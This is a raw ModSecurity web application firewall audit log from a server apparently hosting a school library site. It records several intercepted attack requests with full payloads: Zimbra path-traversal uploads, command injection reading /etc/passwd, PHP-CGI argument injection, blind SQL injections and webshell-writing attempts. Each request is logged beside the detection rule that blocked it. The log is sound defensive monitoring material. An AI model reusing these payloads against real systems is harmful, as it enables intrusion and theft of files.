/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168119869 --65165c6c-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --65165c6c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65165c6c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876018122672 4895 (- - -) Stopwatch2: 1747876018122672 4895; combined=3565, p1=428, p2=3108, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65165c6c-Z-- --add4a712-A-- [22/May/2025:08:06:58 +0700] aC54smfriXjg62qQwE_oaQAAAIM 103.236.140.4 41122 103.236.140.4 8181 --add4a712-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 166330685 --add4a712-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --add4a712-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --add4a712-E-- --add4a712-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876018154587 4414 (- - -) Stopwatch2: 1747876018154587 4414; combined=3301, p1=344, p2=2925, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --add4a712-Z-- --bd726b5c-A-- [22/May/2025:08:12:46 +0700] aC56Dn0O04WKE1HJ5iQCzQAAABg 103.236.140.4 41448 103.236.140.4 8181 --bd726b5c-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 166330831 --bd726b5c-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --bd726b5c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd726b5c-E-- --bd726b5c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747876366796056 2306 (- - -) Stopwatch2: 1747876366796056 2306; combined=700, p1=522, p2=137, p3=0, p4=0, p5=41, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd726b5c-Z-- --e4a28c42-A-- [22/May/2025:08:19:01 +0700] aC57heThJmFSRJ5-OZdblgAAAFI 103.236.140.4 41774 103.236.140.4 8181 --e4a28c42-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e4a28c42-C-- --e4a28c42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4a28c42-E-- --e4a28c42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747876741319200 4042 (- - -) Stopwatch2: 1747876741319200 4042; combined=2178, p1=482, p2=1655, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4a28c42-Z-- --ff991c3c-A-- [22/May/2025:08:29:46 +0700] aC5-CmfriXjg62qQwE_otgAAAJc 103.236.140.4 42586 103.236.140.4 8181 --ff991c3c-B-- GET /attachment?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168598627 --ff991c3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ff991c3c-E-- --ff991c3c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /attachment?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877386693450 2825 (- - -) Stopwatch2: 1747877386693450 2825; combined=684, p1=527, p2=125, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff991c3c-Z-- --aa19cb3a-A-- [22/May/2025:08:30:05 +0700] aC5-HWfriXjg62qQwE_ovQAAAIg 103.236.140.4 42606 103.236.140.4 8181 --aa19cb3a-B-- GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 166625971 --aa19cb3a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa19cb3a-E-- --aa19cb3a-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877405270617 3562 (- - -) Stopwatch2: 1747877405270617 3562; combined=1785, p1=491, p2=1260, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa19cb3a-Z-- --1d1ec367-A-- [22/May/2025:08:30:05 +0700] aC5-HWfriXjg62qQwE_ovgAAAIA 103.236.140.4 42606 103.236.140.4 8181 --1d1ec367-B-- GET /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168598639 --1d1ec367-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1d1ec367-E-- --1d1ec367-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877405275980 2169 (- - -) Stopwatch2: 1747877405275980 2169; combined=1239, p1=329, p2=883, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d1ec367-Z-- --28231a31-A-- [22/May/2025:08:30:11 +0700] aC5-I2friXjg62qQwE_owQAAAIs 103.236.140.4 42606 103.236.140.4 8181 --28231a31-B-- GET /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168598645 --28231a31-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28231a31-E-- --28231a31-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877411276427 2702 (- - -) Stopwatch2: 1747877411276427 2702; combined=1598, p1=419, p2=1147, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28231a31-Z-- --23fd186d-A-- [22/May/2025:08:30:12 +0700] aC5-JGfriXjg62qQwE_owgAAAIw 103.236.140.4 42606 103.236.140.4 8181 --23fd186d-B-- GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 166625980 --23fd186d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --23fd186d-E-- --23fd186d-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877412273062 2866 (- - -) Stopwatch2: 1747877412273062 2866; combined=1536, p1=426, p2=1079, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23fd186d-Z-- --ac89901c-A-- [22/May/2025:08:30:14 +0700] aC5-JmfriXjg62qQwE_oxAAAAIc 103.236.140.4 42628 103.236.140.4 8181 --ac89901c-B-- POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../ppdqhdnl.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/octet-stream X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166625983 --ac89901c-C-- file error --ac89901c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac89901c-E-- --ac89901c-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=../ppdqhdnl.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877414267651 2467 (- - -) Stopwatch2: 1747877414267651 2467; combined=1279, p1=370, p2=883, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac89901c-Z-- --5b463613-A-- [22/May/2025:08:30:14 +0700] aC5-JmfriXjg62qQwE_oxQAAAIE 103.236.140.4 42632 103.236.140.4 8181 --5b463613-B-- POST /uapws/saveDoc.ajax?ws=/../../0U9nv.jspx%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 314 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 162989786 --5b463613-C-- content= out.println("ilcuotvklp");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --5b463613-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b463613-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../0U9nv.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877414270078 3154 (- - -) Stopwatch2: 1747877414270078 3154; combined=1759, p1=406, p2=1325, p3=0, p4=0, p5=28, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b463613-Z-- --5ae4465a-A-- [22/May/2025:08:30:24 +0700] aC5-MCektx75wRFPQyiCggAAANU 103.236.140.4 42656 103.236.140.4 8181 --5ae4465a-B-- GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 162989798 --5ae4465a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ae4465a-E-- --5ae4465a-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877424287798 2568 (- - -) Stopwatch2: 1747877424287798 2568; combined=1434, p1=421, p2=983, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ae4465a-Z-- --c7d1ab12-A-- [22/May/2025:08:33:41 +0700] aC5-9eThJmFSRJ5-OZdb4wAAAEI 103.236.140.4 42898 103.236.140.4 8181 --c7d1ab12-B-- GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.0 Host: 222.77.136.93 Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 222.77.136.93 X-Forwarded-Server: 222.77.136.93 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 --c7d1ab12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7d1ab12-E-- --c7d1ab12-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||222.77.136.93|F|2"] [data 